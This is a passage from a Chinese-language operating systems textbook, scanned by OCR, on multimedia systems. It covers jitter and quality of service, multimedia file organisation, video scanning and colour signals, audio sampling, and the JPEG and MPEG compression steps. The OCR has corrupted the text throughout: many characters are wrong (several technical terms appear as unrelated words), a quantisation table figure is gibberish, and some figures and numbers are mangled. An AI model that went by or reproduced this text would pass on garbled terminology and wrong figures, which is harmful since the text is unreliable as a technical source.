40ms 的 精确 时 间 间隔 传输 ， 否 则 电影 看 起 来 将 会 有 起 伏 。 

NTSC 代 表 美 国 国 家 电视 标准 委员 会 (National Television Standards Committee) ， 但 是 当 彩 色 电视 
发 明 时 将 彩色 引入 该 标准 的 拙劣 方法 产生 了 业界 的 一 个 笑话 ， 戏称 NTSC 代 表决 不 复 现 相同 的 颜色 
(Never Twice the Same Color)。PAL 代 表 相位 交错 排列 (Phase Alternating Line), 它 是 技术 上 最 好 的 制 
式 。SECAM 代 表 顺 序 与 存储 彩色 (SEquentiel Couleur Avec Memoire) ， 该 制式 被 法 国 采用 ， 意 在 保护 
法 国 的 电视 制造 商 免 受 国外 竞争 。SECAM 还 被 东欧 国家 所 采用 。 

耳 洒 比 眼睛 更 加 敏感 ， 传 输 时 间 中 即使 存在 几 毫 秒 的 变动 也 会 被 察觉 到 。 传 输 率 的 变动 称 为 启动 
(jitter) ， 必 须 严格 限制 申 动 以 获得 良好 的 性 能 。 注 意 ， 颜 动 不 同 于 延迟 。 如 果 图 7-1 中 的 分 布 式 网 络 均 
匀 地 将 所 有 的 位 准确 地 延迟 5s， 电 影 将 开始 得 稍稍 晚 一 些 ， 但 是 看 起 来 却 不 错 。 但 从 另 一 方面 来 说 ， 如 
果 分 布 式 网 络 在 100~200ms 之 间 随 机 地 延迟 各 帧 ， 那 么 不 论 是 谁 主演 的 电影 ， 看 起 来 都 像 是 查理 . 车 别 
林 的 老 片 。 

让 人 可 以 接受 地 回放 多 媒体 所 要 求 的 实时 性 通常 通过 服务 质量 (quality of service) 参数 来 描述 ， 
这 些 参数 包括 可 用 平均 带宽 、 可 用 峰值 带宽 、 最 小 和 最 大 延迟 (两 者 一 起 限制 了 赢 动 ) 以 及 位 丢失 概率 。 
例如 ， 网 络 运营 商 提供 的 服务 可 以 保证 4 Mbps 的 平均 带宽 、 105~110ms 时 间 间 隔 之 内 99% 的 传输 延迟 以 
及 10“" 的 位 丢失 概率 ， 那 么 这 样 的 服务 质量 对 于 MPEG-2 电 影 来 说 是 非常 好 的 。 网 络 运营 商 还 可 以 提供 
价格 更 为 低廉 等 级 也 比较 低 的 服务 ， 例 如 平均 带宽 为 1 Mbps (如 ADSL)， 在 这 种 情况 下 ， 服务 质量 就 不 
得 不 打 些 折扣 ， 可 能 是 降低 分 辨 率 、 降 低 帧 率 或 者 是 放弃 颜色 信息 以 黑白 方式 播放 电影 。 

提供 服务 质量 保证 的 最 常见 的 方法 是 预先 为 每 一 个 新 到 的 客户 预 留 容量 ， 预 留 的 资源 包括 CPU、 内 
存 缓冲 区 、 磁 盘 传输 容量 以 及 网 络 带 宽 。 如 果 一 位 新 的 客户 到 来 并 且 想 观看 -- 部 电影 ， 但 是 视频 服务 器 
或 网 络 计算 出 不 具有 为 另 一 位 客户 提供 服务 的 容量 ， 那 么 它 将 拒绝 新 的 客户 ， 以 避免 降低 向 当前 客户 提 
供 的 服务 质量 。 因 此 ， 多 媒体 服务 器 需要 有 资源 预 留 方案 和 进入 控制 算法 (admission control algorithm), 
以 判定 什么 时 候 能 够 处 理 更 多 的 任务 。 
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72 多 媒体 文件 

在 大 多 数 系统 中 ， 普 通 的 文本 文件 由 字 节 的 线性 序列 组 成 ， 没 有 操作 系统 了 解 或 关心 的 任何 结构 。 
对 于 多 媒体 而 言 ， 情 况 就 复杂 多 了 了。 首先， 视频 与 音频 是 完全 不 同 的 。 它 们 由 不 同 的 设备 捕获 (视频 为 
CCD 芯 片 ， 音 频 为 麦克 风 ) ， 具 有 不 同 的 内 部 结构 (视频 每 秒 有 25~30 帧 ， 音 频 每 秒 有 44 100 个 样本 ) ， 
并 且 它 们 通过 不 同 的 设备 来 回放 (视频 为 显示 器 ， 音 频 为 扩 音 器 ) 。 

此 外 ， 大 多 数 好 莱 坞 电影 现在 针对 的 是 全 世界 的 观众 ， 而 这 些 观众 大 多 不 讲 英语 。 这 一 情况 有 两 种 
处 理 方法 。 对 于 某 些 国家 ， 需 要 产生 一 个 额外 的 声音 轨迹 ， 用 当地 语言 进行 配音 ， 但 是 不 包含 音效 。 在 
日 本 ， 所 有 的 电视 都 具有 两 个 声 道 ， 电 视 观众 看 外 国 影片 时 可 以 听 原 声 语言 也 可 以 听 日 语 ， 遥 控 器 上 有 
一 个 按钮 可 以 用 来 进行 语言 选择 。 在 其 他 国家 中 ， 使 用 的 是 原始 的 声音 轨迹 ， 配 以 当地 语言 的 字幕 。 

除 此 之 外 ， 许 多 在 电视 中 播放 的 电影 现在 也 提供 英文 字幕 ， 使 讲 英语 但 是 听力 较 弱 的 人 可 以 观看 。 
结果 ， 数 字 电影 实际 上 可 能 由 多 个 文件 组 成 : 一 个 视频 文件 、 多 个 音频 文件 以 及 多 个 包含 各 种 语言 字幕 
的 文本 文件 。DVD 能 够 存放 至 多 32 种 语言 的 字幕 文件 。 简 单 的 一 组 多 媒体 文件 如 图 7-3 所 示 ， 我 们 将 在 
本 章 后 面 解释 快 进 和 快 倒 的 含义 。 


1 
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快 进 


快 倒 


图 7-3 电影 可 能 由 若干 文件 组 成 


因此 ， 文 件 系统 需要 跟踪 每 个 文件 的 多 个 “ 子 文件 "。 一 种 可 能 的 方案 是 像 传统 的 文件 一 样 管理 每 
个 子 文件 (例如 ， 使 用 i 节点 来 跟踪 文件 的 块 )， 并 且 要 有 一 个 新 的 数据 结构 列 出 每 个 多 媒体 文件 的 全 部 
子 文件 。 另 一 方法 是 创造 一 种 二 维 的 i 节点 ， 使 每 一 列 列 出 每 个 子 文件 的 全 部 块 。 一 般 而 言 ， 其 组 织 必 
须 能 够 使 观众 观看 电影 时 可 以 动态 地 选择 使 用 哪个 音频 及 字幕 轨迹 。 

在 各 种 情况 下 ， 还 必须 有 保持 子 文件 同步 的 某 种 方法 ， 这 样 才能 保证 当选 中 的 音频 轨迹 回放 时 与 视 
频 保持 同步 。 如 果 音频 与 视频 存在 即使 是 轻微 的 不 同步 ， 观 众 可 能 会 在 演员 的 嘴唇 运动 之 前 或 之 后 才 听 
到 他 说 的 话 ， 这 很 容易 察觉 到 ， 相 当 让 人 扫兴 。 

为 了 更 好 地 理解 多 媒体 文件 是 如 何 组 织 的 ， 有 必要 在 某 种 细节 程度 上 了 解数 字音 频 与 数字 视频 是 如 
何 工 作 的 ， 下 面 我 们 将 介绍 这 些 主题 。 


7.2.1 视频 编码 

人 类 的 眼睛 具有 这 样 的 特性 : 当 一 幅 图 像 闪 现在 视网膜 上 时 ， 在 它 衰退 之 前 将 保持 儿童 秒 的 时 间 。 
如 果 一 个 图 像 序列 以 每 秒 50 或 更 多 张 图 像 闪 现 ， 眼 睛 就 不 会 注意 到 它 看 到 的 是 不 连续 的 图 像 。 所 有 基于 
视频 或 影片 胶片 的 运动 图 像 系 统 都 利用 了 这 一 原理 产生 活动 的 画面 。 

要 想 理解 视频 系统 ， 最 好 从 简单 且 过 时 的 黑白 电视 开始 。 为 了 将 二 维 图 像 表示 为 作为 时 间 函 数 的 一 
维 电压 ， 摄 像 机 用 一 个 电子 束 对 图 像 进行 横向 扫描 并 缓慢 地 向 下 移动 ， 记 录 下 电子 束 经 过 处 光 的 强度 。 
在 扫描 的 终点 处 ， 电 子 束 折 回 ， 称 为 一 帧 (frame)。 这 一 作为 时 间 函 数 的 光 的 强度 以 广播 方式 传播 出 去 ， 
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接收 机 则 重复 扫描 过 程 以 重 构图 像 。 摄 像 机 与 接收 机 采用 的 扫描 模式 如 图 7-4 所 示 。(CCD 摄 像 机 的 成 像 
方式 是 积分 而 非 扫描 ， 但 是 某 些 摄像 机 及 所 有 的 CRT 显 示 器 采用 的 都 是 扫描 方式 。) 

精确 的 扫描 参数 随 国 家 的 不 同 而 有 所 不 同 。NTSC 有 525 条 扫描 线 ， 水 平 与 垂直 方向 的 纵横 比 为 4:3， 
每 秒 为 30 (实际 为 29.97) 帧 。 欧 洲 的 PAL 和 SECAM 人 制式 有 625 条 扫描 线 ， 纵 横 比 也 是 4:3， 每 种 为 25 帧 。 
在 两 种 制式 中 , 顶端 和 底 端 的 几 条 线 是 不 显示 的 (为 的 是 在 原始 的 圆 形 CRT 上 显示 一 个 近似 矩形 的 图 像 ) 。 
525 条 NTSC 扫 描 线 中 只 显示 483 条 ，625 条 PAL/SECAM 扫 描 线 中 只 显示 576 条 。 

虽然 每 秒 25 帧 足以 捕获 平滑 的 运动 ， 但 是 在 这 样 的 帧 率 下 ， 有 许多 人 特别 是 老年 人 会 感觉 到 图 像 闪 
烁 (因为 新 的 图 像 尚 未 出 现 以 前 旧 的 图 像 就 已 经 在 视网膜 上 消失 )。 增 加 帧 率 就 会 对 稀缺 的 带宽 提出 更 
多 的 要 求 ， 因 此 要 采取 不 同 的 方法 。 这 一 方法 不 是 按 从 上 到 下 的 顺序 显示 扫描 线 ， 而 是 首先 显示 所 有 的 
奇数 扫描 线 ， 接 着 再 显示 所 有 的 偶数 扫描 线 。 此 处 的 半 帧 称 为 一 个 场 (field)。 实 验 表明 ， 尽 管 人 们 在 
每 秒 25 帧 时 感觉 到 闪烁 ， 但 是 在 每 秒 50 场 时 却 感 觉 不 到 。 这 一 技术 被 称 为 启 行 扫描 (interlacing)。 非 隔 
行 扫描 的 电视 或 视频 被 称 为 逐 行 扫描 (progressive) 。 

彩色 视频 采用 与 单 色 (RA) 视频 相同 的 扫描 模式 ， 只 不 过 使 用 了 三 个 同时 运动 的 电子 东 而 不 是 一 
个 运动 电子 束 来 显示 图 像 ， 对 于 红 、 绿 和 蓝 (КОВ) 这 三 个 加 性 原色 中 的 每 一 颜色 使 用 一 个 电子 东 。 这 
一 技术 能 够 工作 是 因为 任何 颜色 都 可 以 由 红 、 绿 和 蓝 以 适当 的 强度 线性 又 加 而 构造 出 来 。 然 而 ， 为 了 在 
一 个 信道 上 进行 传输 ， 三 个 彩色 信号 必须 组 合成 一 个 复合 (composite) 信号 。 

下 一 场 的 屏幕 上 画 出 的 
扫描 线 起 始 处 扫描 线 


下 时间 
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图 7-4 NTSC 视 频 和 电视 使 用 的 扫描 模式 


为 了 使 黑白 接收 机 可 以 显示 传输 的 彩色 电视 节目 ，NTSC、PAL 和 SECAM 三 种 制式 均 将 RGB 信号 线 
性 组 合 为 一 个 亮度 (luminance) 信号 和 两 个 色 度 (chrominance) 信号 ， 但 是 不 同 的 制式 使 用 不 同 的 系 
数 从 RGB 信号 构造 这 些 信 号 。 说 来 也 奇怪 ， 人 的 眼睛 对 亮度 信号 比 对 色 度 信号 敏感 得 多 ， 故 色 度 信号 倒 
不 必 非 要 精确 地 进行 传输 。 因 此 ， 亮 度 信号 应 该 用 与 昌 的 黑白 信号 相同 的 频率 进行 广播 ， 从 而 使 其 可 以 
被 黑白 电视 机 接收 。 两 个 色 度 信号 则 可 以 以 更 高 的 频率 用 较 窜 的 波段 进行 广播 。 某 些 电视 机 有 标 着 亮度 、 
色调 和 饱和 度 《或 者 是 亮度 、 色 彩 和 颜色 ) 字样 的 旋钮 或 调节 装置 ， 可 以 分 别 控制 这 三 个 信号 。 理 解 亮 
度 和 色 度 对 于 理解 视频 压缩 的 工作 原理 是 十 分 必要 的 。 

到 目前 为 止 我 们 介绍 的 都 是 模拟 视频 ， 现 在 让 我 们 转向 数字 视频 。 数 字 视 频 最 简单 的 表示 方法 是 帧 
的 序列 ， 每 一 帧 由 旦 矩形 李 格 的 图 像 要 素 即 像素 (pixel) 组 成 。 对 于 彩色 视频 ， 每 一 像素 RGB 三 色 中 的 
每 种 颜色 用 8 个 二 进 制 位 来 表示 ， 这 样 可 以 表示 2* ~ 1600 万 种 不 同 的 颜色 ， 已 经 足够 了 。 人 的 眼睛 没有 
能 力 区 分 这 么 多 颜色 ， 更 不 用 说 更 多 的 颜色 了 。 

要 产生 平滑 的 运动 效果 ， 数 字 视 频 像 模拟 视频 一 样 必须 每 秒 至 少 显示 25 帧 。 然 而 ， 由 于 高 质量 的 计 
算 机 显示 器 通常 用 存放 在 视频 RAM 中 的 图 像 每 秒 钟 扫描 屏幕 75 次 或 更 多 次 ， 隔 行 扫描 是 不 必要 的 ， 因 
此 所 有 计算 机 显示 器 都 采用 和 逐 行 扫描 。 仅 仅 连续 刷新 (也 就 是 重 绘 ) 相同 的 帧 三 次 就 足以 消除 闪烁 。 
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换言之 ， 运 动 的 平滑 性 是 由 每 秒 不 同 的 图 像 数 决定 的 ， 而 闪烁 则 是 由 每 秒 刷新 屏幕 的 次 数 决定 的 。 
这 两 个 参数 是 不 同 的 。 一 幅 静 止 的 图 像 以 每 秒 20 帧 的 频率 显示 不 会 表现 出 断断续续 的 运动 ， 但 是 却 会 出 
现 闪烁 ， 因 为 当 一 帧 画面 在 视网膜 上 消退 时 下 一 帧 还 没有 出 现 。 一 部 电影 每 秒 有 20 个 不 同 的 帧 ， 在 80 
Hz 的 刷新 率 下 每 一 帧 将 连续 绘制 4 次 ， 这 样 不 会 出 现 闪烁 ， 但 是 运动 将 是 断断续续 的 。 

当 我 们 考虑 在 网 络 上 传输 数字 视频 所 需要 的 带宽 时 ， 这 两 个 参数 的 重要 性 就 十 分 清楚 了 。 目 前 许多 
计算 机 显示 器 都 采用 4:3 的 纵横 比 ， 所 以 可 以 使 用 便宜 的 并 且 大 量 生产 的 显像管 ， 这 样 的 显像管 本 来 是 
为 电视 市 场 的 消费 者 设计 的 。 显 示 器 常用 的 配置 有 640 х 480 (VGA), 800x600 (SVGA), 1024 x 768 
(XGA) 以 及 1600 х 1200 (UXGA)。 每 像素 24 位 的 UXGA 显 示 以 及 25 帧 / 秒 ， 需要 1.2Gbps 的 带宽 ， 即 使 
VGA 显 示 也 需要 184Mbps。 将 这 些 速率 加 倍 以 避免 闪烁 是 没有 吸引 力 的 ， 更 好 的 解决 方案 是 每 秒 传输 25 
帧 ， 同 时 让 计算 机 保存 每 一 帧 并 将 其 绘制 两 次 。 广 播 方式 的 电视 没有 使 用 这 一 策略 ， 因为 电视 机 没有 存 
储 器 ， 并 且 模拟 信号 如 果 不 首先 转换 成 数字 形式 无 论 如 何 也 无 法 存放 在 RAM 中 ， 而 模 数 转换 则 需要 额 
外 的 硬件 。 因 此 ， 隔 行 扫描 对 于 广播 方式 的 电视 而 言 是 需要 的 ， 但 是 对 数字 视频 则 不 需要 。 


722 音频 编码 

音频 (声音 ) 波 是 一 维 的 声 (E) 波 。 当 声波 进入 人 耳 的 时 候 ， 鼓 膜 将 振动 ， 导致 内 耳 的 小 骨 随 之 
振动 ， 将 神经 脉冲 送 和 大 脑 ， 这 些 脉冲 被 收听 者 感知 为 声音 。 类 似 地 ， 当 声 波 冲击 麦克 风 的 时 候 ， 麦 克 
风 将 产生 电信 和 号， 将 声音 的 振幅 表示 为 时 间 的 函数 。 

人 耳 可 以 听 到 的 声音 的 频率 范围 从 20 Hz 到 20 000Hz， 而 某 些 动物 ， 特别 是 狗 ， 能 够 听 到 更 高 频率 
的 声音 。 耳 条 是 以 对 数 规律 听 声 音 的 ， 所 以 两 个 振幅 为 4 和 B 的 声音 的 比率 习惯 以 4B (分 贝 ) 为 单位 来 
表示 ， 公 式 为 

dB = 20 logo (A / B) 

如 果 我 们 定义 1 kHz 正弦 波 可 听 度 的 下 限 (压力 大 约 为 0.0003 dyne/ ст?) 为 0 dB， 那 么 日 常 谈话 大 
约 为 50 dB， 而 使 人 感到 痛苦 的 阔 值 大 约 为 120 dB, 动态 范围 为 一 百 万 量 级 。 为 避免 混 清 ， 上 面 公式 中 
的 A 和 B 是 振幅 。 如 果 我 们 使 用 的 是 功率 水 平 ， 则 上 面 公式 中 对 数 前 面 的 系数 应 该 为 10， 而 不 是 20， 因 
为 功率 与 振幅 的 平方 成 正比 。 

音频 波 可 以 通过 模 数 转换 器 (Analog Digital Converter, ADC) 转换 成 数字 形式 。ADC 以 电压 作为 
输入 ， 并 且 生成 二 进 制 数 作为 输出 。 图 7-5a 中 为 一 个 正弦 波 的 例子 。 为 了 数字 化 地 表示 该 信号 ， 我 们 可 
以 每 隔 AT 秒 对 其 进行 采样 ， 如 图 7-5b 中 的 条 棒 高 度 所 示 。 如 果 一 个 声波 不 是 纯粹 的 正弦 波 ， 而 是 正弦 波 
的 线性 肥 加 ， 其 中 存在 的 最 高 频率 成 分 为 [， 那 么 以 2f 的 频率 进行 采样 就 是 够 了 。1924 年 贝尔 实验 室 的 
一 位 物理 学 家 Harry Nyquist 从 数学 上 证 明了 这 一 结果 ， 这 就 是 著名 的 Nyquist 抽 样 定理 。 更 多 地 进行 采样 
是 没有 价值 的 ， 因 为 如 此 采样 可 以 检测 到 的 更 高 的 频率 并 不 存在 。 


1.00 
0.75 


a) b) с) 
图 7-5 а) 正弦 波 ，b) 对 正弦 波 进行 采样 ，c) 对 样本 进行 4 位 量化 


数字 样本 是 不 准确 的 。 图 7-5c 中 的 样本 只 允许 9 个 值 ， 从 --1.00 到 1.00， 步 长 为 0.25， 因此 ， 需 要 4 个 
二 进 制 位 来 表示 它们 。8 位 样本 可 以 有 256 个 不 同 的 值 ，16 位 样本 可 以 有 65 536 个 不 同 的 值 。 由 于 每 一 样 
本 的 位 数 有 限 而 引入 的 误差 称 为 量化 噪声 quantization noise)。 如 果 量 化 噪声 太 大 ， 耳 朱 就 会 感觉 到 。 

对 声音 进行 采样 的 两 个 著名 的 例子 是 电话 和 音频 CD。 电话 系统 使 用 的 是 脉冲 编码 调制 (pulse code 
modulation), ， 脉 冲 编码 调制 每 秒 以 7 位 (北美 和 日 本 ) 或 8 位 (欧洲) 对 声音 采样 8000 次 ， 故 这 一 系统 的 
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数据 率 为 56 000 bps 或 64 000 bps。 由 于 每 秒 只 有 8000 个 样本 ， 所 以 4 kHz 以 上 的 频率 就 丢失 了 。 

音频 CD 是 以 每 秒 44 100 个 样本 的 采样 率 进行 数字 化 的 ， 足 以 捕获 最 高 达到 22 050 Hz 的 频率 ， 这 对 
于 人 而 言 是 很 好 的 ,但 是 对 于 狗 而 言 却 是 很 差 的 。 每 一 样本 在 其 振幅 范围 内 以 16 位 进行 线性 量化 。 
16 位 样本 只 有 65 536 个 不 同 的 值 ， 而 人 耳 以 最 小 可 听 度 为 步 长 进行 测量 时 的 动态 范围 大 约 为 一 百 万 。 所 
以 每 个 样本 只 有 16 位 引入 了 某 些 量化 唤 声 (尽管 没有 巴 盖 全 部 动态 范围 ， 但 是 人 们 并 不 认为 CD 的 质量 
受到 损害 ) 。 以 每 秒 44 100 个 样本 、 每 个 样本 16 位 计算 ， 音 频 CD 需要 的 带宽 单 声 道 为 705.6 Kbps， 立 体 
声 为 1.411 Mbps (参见 图 7-2) 。 音频 压缩 也 许 要 以 描述 人 类 听觉 如 何 工作 的 心理 声学 模型 为 基础 。 使 用 
MPEG 第 3 层 (MP3) 系统 进行 10 倍 的 压缩 是 可 能 的 。 采用 这 一 格式 的 便携 式 音乐 播放 器 近年 来 已 经 十 
分 普遍 。 

数字 化 的 声音 可 以 十 分 容易 地 在 计算 机 上 用 软件 进行 处 理 。 有 许 许多 多 的 个 人 计算 机 程序 可 以 让 用 
户 从 多 个 信号 源 记录 、 显 示 、 编 辑 、 混 合 和 存储 声波 。 事 实 上 ， 所 有 专业 的 声音 记录 与 编辑 系统 如 今 都 
是 数字 化 的 。 模 拟 方式 基本 上 过 时 了 。 


7.3 视频 压缩 

现在 我 们 已 经 十 分 清楚 ， 以 非 压缩 格式 处 理 多 媒体 信息 是 完全 不 可 能 的 一 它 的 数据 量 太 大 了 ， 惟 
一 的 希望 是 有 可 能 进行 大 比例 的 数据 压缩 。 幸 运 的 是 ， 在 过 去 几 十 年 ， 大 量 的 研究 群体 已 经 发 明了 许多 
压缩 技术 和 算法 ， 使 多 媒体 传输 成 为 可 能 。 在 下 面 几 节 中 ， 我 们 将 研究 一 些 多 媒体 数据 (特别 是 图 像 ) 
的 压缩 方法 ， 更 多 的 细节 请 参见 (Fluckiger, 1995; Steinmetz 和 Nahrstedt, 1995), 

所 有 的 压缩 系统 都 需要 两 个 算法 ， 一 个 用 于 在 源 端 对 数据 进行 压缩 ， 另 一 个 用 于 在 目的 端 对 数据 进 
行 解压 缩 。 在 文献 中 ， 这 两 个 算法 分 别 被 称 为 编码 (encoding) 算法 和 解码 (decoding) 算法 ， 我 们 在 
本 书 中 也 使 用 这 样 的 术语 。 

这 些 算法 具有 某 些 不 对 称 性 ， 这 一 不 对 称 性 对 于 理解 数据 压缩 是 十 分 重要 的 。 首先 ， 对 于 许多 应 用 
而 言 ， 一 个 多 媒体 文档 (比如 说 一 部 电影 ) 只 需要 编码 一 次 ( 当 该 文档 存储 在 多 媒体 服务 器 上 时 )， 但 
是 需要 解码 数 千 次 ( 当 该 文档 被 客户 观看 时 )。 这 一 不 对 称 性 意味 着 ， 假若 解码 算法 速度 快 并 且 不 需要 
昂贵 的 硬件 ， 那 么 编码 算法 速度 慢 并 且 需 要 昂贵 的 硬件 也 是 可 以 接受 的 。 从 另 一 方面 来 说 ， 对 于 诸如 视 

会 议 这 样 的 实时 多 媒体 而 言 ， 编 码 速度 慢 是 不 可 接受 的 ， 在 这 样 的 场合 ， 编 码 必须 即时 完成 。 

第 二 个 不 对 称 性 是 编码 /解码 过 程 不 必 是 100% 可 逆 的 。 也 就 是 说 ， 当 对 一 个 文件 进行 压缩 并 进行 传 
输 ， 然 后 对 其 进行 解压 缩 时 ， 用 户 可 以 期 望 取 回 原始 的 文件 ， 准确 到 最 后 一 位 。 对 于 多 媒体 ， 这 样 的 要 
求 是 不 存在 的 。 视频 信号 经 过 编码 和 解码 之 后 与 原始 信号 只 存在 轻微 的 差异 通常 就 是 可 以 接受 的 。 当 解 
码 输 出 不 与 原始 输入 严格 相等 时 ， 系 统 被 称 为 是 有 损 的 (lossy)。 所 有 用 于 多 媒体 的 压缩 系统 都 是 有 损 
的 ， 因 为 这 样 可 以 获得 更 好 的 压缩 效果 。 


7.3.1 JPEG 标 准 

用 于 压缩 连续 色调 静止 图 像 (例如 照片 ) 的 JPEG (Joint Photographic Experts Group, KSAY 
家 组 ) 标准 是 由 摄影 专家 在 ITU、ISO 和 IEC 等 其 他 标准 组 织 的 支持 下 开发 出 来 的 。 JPEG 标 准 对 于 多 媒 
体 而 言 是 十 分 重要 的 ， 因为 用 于 压缩 运动 图 像 的 标准 MPEG 不 过 是 分 别 对 每 一 帧 进行 JPEG 编 码 ， 再 加 上 
某 些 帧 间 压 缩 和 运动 补偿 等 额外 的 特征 。JPEG 定 义 在 10918 号 国际 标准 中 。 它 具 有 4 种 模式 和 许多 选项 ， 
但 是 我 们 在 这 里 只 关心 用 于 24 位 RGB 视频 的 方法 ， 并 且 省 略 了 许多 细节 。 

用 JPEG 对 一 幅 图 像 进行 编码 的 第 一 步 是 块 预制 。 为 明确 起 见 ， 我 们 假设 JPEG 输 入 是 一 幅 640 x 480 
的 RGB 图 像 ， 每 个 像素 24 位 ， 如 图 7-6a 所 示 。 由 于 使 用 亮度 和 色 度 可 以 获得 更 好 的 压缩 效果 ， 所 以 从 
RGB 值 中 计算 出 一 个 亮度 信号 和 两 个 色 度 信和 号， 对 于 NTSC 制 式 ， 分 别 将 其 记 作 Y、1 和 Q， 对 于 PAL 制 
式 ， 分 别 将 其 记 作 Y、U 和 V， 两 种 制式 的 计算 公式 是 不 同 的 。 下 面 我 们 将 使 用 NTSC 的 符号 ， 但 是 压缩 
算法 是 相同 的 。 

对 Y、L 和 Q 构 造 不 同 的 矩阵 ， 每 个 矩阵 其 元 素 的 取 值 范围 在 0 到 255 之 间 。 接 下 来 ， 在 I 和 Q 和 矩阵 中 对 
由 4 个 元 素 组 成 的 方块 进行 平均 ， 将 矩阵 缩小 至 320 x 240, 这 一 缩小 是 有 损 的 ， 但 是 眼睛 几乎 注意 不 到 ， 
因为 眼睛 对 亮度 比 对 色 度 更 加 敏感 ， 然而 这 样 做 的 结果 是 将 数据 压缩 了 2 倍 。 现 在 将 所 有 三 个 矩阵 的 每 
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个 元 素 减 去 128， 从 而 将 0 置 于 取 值 范围 的 中 间 。 最 后 将 每 个 矩阵 划分 成 8 x 8 的 块 ，Y 和 矩阵 有 4800 块 ， 其 
他 两 个 矩阵 每 个 有 1200 块 ， 如 图 7-6b 所 示 。 


нов ү 1 
640 


~ 一 一 4 一 一 一 


24 位 像素 第 4799 块 ” а 
а) b) 


图 7-6 a) RGB 输 入 数据 ，b) 块 预制 之 后 


JPEG 的 第 2 步 是 分 别 对 7200 块 中 的 每 一 块 应 用 DCT (离散 余弦 变换 )。 每 一 DCT 的 输出 是 一 个 8 x8 
的 DCT 系 数 矩 阵 。DCT 和 矩阵 的 〈0, 0) 元 素 是 块 的 平均 值 ， 其 他 元 素 表明 每 一 空间 频率 存在 多 大 的 谱 功 
率 。 对 于 熟悉 传 立 叶 变换 的 读者 而 言 ， DCT 则 是 一 种 二 维 的 空间 传 立 叶 变换 。 在 理论 上 ，DCT 是 无 损 的 ， 
但 是 在 实践 中 由 于 使 用 浮 点 数 和 超越 函数 总 要 引入 菜 些 舍 人 误差， 从 而 导致 轻微 的 信息 损失 。 通 常 这 些 
元 素 随 着 到 (0,0) 元 素 距离 的 增加 而 迅速 衰减 ， 如 图 7-7b 所 示 。 


YQ 振幅 


图 7-7 a) Y 拢 阵 的 一 块 ，b) DCT 系 数 


DCT 完 成 之 后 ，JPEG 进 入 到 第 3 步 ， 称 为 量化 (quantization) ， 在 量化 过 程 中 不 重要 的 DCT 系 数 将 
被 去 除 。 这 一 (AM) 变换 是 通过 将 8 x 8 DCT 和 矩阵 中 的 每 个 元 素 除 以 取 自 一 张 表 中 的 权 值 而 实现 的 。 
如 果 所 有 权 值 都 是 1， 那 么 该 变换 将 不 做 任何 事情 。 然 而 ， 如 果 权 值 随 着 离 原点 的 距离 而 急剧 增加 ， 那 
么 较 高 的 空间 频率 将 迅速 衰落 。 

图 7-8 给 出 了 这 一 步 的 一 个 例子 ， 在 图 7-8 中 我 们 可 以 看 到 初始 DCT 和 矩阵 、 量 化 表 和 通过 将 每 个 DCT 
元 素 除 以 相应 量化 表 元 素 所 获得 的 结果 。 量 化 表 中 的 值 不 是 JPEG 标 准 的 一 部 分 。 每 一 应 用 必须 提供 自 
己 的 量化 表 ， 这 样 就 给 应 用 以 控制 自身 压缩 损失 权衡 的 能 力 。 


DCT 系 数 量化 系数 ж 
әоГәо Тао ааа ә] [5]ю]]5[1[[°[°][[[:[а[в[6]зе[в 
э2[76 [зе |то[е |10] [olse] |i [olofo] mil 2l al elelsafes 
52| зв [26| 817 [а [0о[о| | 2тө |12 |1 ojojo] [2| 2| 2| «| вез [е 
12| ве [а 2 [1 [olo aj 2211 [о [0 [оо] (4|4| 4| «| [иез [64 
ajaj 2 [оо [о[0[о то [о [о о [0 [00|] (ев sl s| в| 16| з2[64 
2111 [0 [0 [о [0 of о[о[о [о [о[ојо | [1е|1в |1 16| 16| 16132164 
[Jofololololo| [0 ооо [о [ооо] [з [зг [21 зо зо 32[з2[6| 
90 [оо [о [о [о[0| olol ооо [0 [00] [6 |6 ||| ||| 
图 7-8 量化 DCT 系 数 的 计算 
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第 4 步 通 过 将 每 一 块 的 (0, 0) 值 (左上 角 元 素 ) 以 它 与 前 一 块 中 相应 元 素 相差 的 量 替换 而 减 小 。 由 
于 这 些 元 素 是 各 自 所 在 块 的 平均 ， 它 们 应 该 变化 得 比较 缓慢 ， 所 以 采用 差 值 可 以 将 这 些 元 素 中 的 大 部 分 
缩减 为 较 小 的 值 。 对 于 其 他 元 素 不 计算 差 值 。(0,0) 值 称 为 DC 分 量 ， 其 他 值 称 为 AC 分 量 。 

第 5 步 是 将 64 个 元 素 线性 化 并 且 对 线性 化 得 到 的 列表 进行 行程 长 度 编码 。 从 左 到 右 然后 从 上 到 下 地 
对 块 进行 扫描 不 能 将 零 集中 在 一 起 ， 所 以 采用 了 Z 字 形 的 扫 an TA > 


描 模式 ， 如 图 7-9 所 示 。 在 本 例 中 ，Z 字 形 模式 最 终 在 矩阵 的 
尾部 产生 了 38 个 连续 的 0， 这 一 串 0 可 以 缩减 为 一 个 计数 表明 
有 38 个 0。 

现在 我 们 得 到 一 个 代表 图 像 的 数字 列表 (在 变换 空间 
中 ) ， 第 6 步 将 采用 Huffman 编 码 对 列表 中 的 数字 进行 编码 以 一直 一 十 一 二 
用 于 存储 或 传输 。 A ] irl Ta] 

JPEG 看 来 似乎 十 分 复杂 ， 这 是 因为 它 确实 很 复杂 。 尽 管 
如 此 ， 由 于 它 通常 可 以 获得 20:1 或 更 好 的 压缩 效果 ， 所 以 获 „е 
得 广泛 的 应 用 。 解 码 一 幅 JPEG 图 像 需要 反 过 来 运行 上 述 算法 。 图 7-9 量化 值 传送 的 顺序 
JPEG 大 体 上 是 对 称 的 : 解码 一 幅 图 像 花费 的 时 间 与 编码 基本 
相同 。 

7.3.2 MPEG 标 准 

最 后 ， 我 们 讨论 问题 的 核心 MPEG (Motion Picture Experts Group， 运 动 图 像 专家 组 ) 标准 。 这 是 
用 于 压缩 视频 的 主要 算法 ， 并 于 1993 年 成 为 国际 标准 。MPEG-1 (第 11172 号 国际 标准 ) 设计 用 于 视频 录 
像 机 质量 的 输出 (对 NTSC 制 式 为 352 x 240)， 它 使 用 的 位 率 为 1.2 Mbps。MPEG-2 (第 13818 号 国际 标准 ) 
设计 用 于 将 广播 质量 的 视频 压缩 至 4 Mbps 到 6 Mbps， 这 样 就 可 以 适应 NTSC 或 PAL 制 式 的 广播 频道 。 

MPEG 的 两 个 版 本 均 利 用 了 在 电影 中 存在 的 两 类 元 余 ， 空间 宛 余 和 时 间 宛 余 。 空间 元 余 可 以 通过 简 
单 地 用 JPEG 分 别 对 每 一 帧 进行 编码 而 得 到 利用 。 互 相连 续 的 帧 常常 几乎 是 完全 相同 的 ， 这 就 是 时 间 宛 
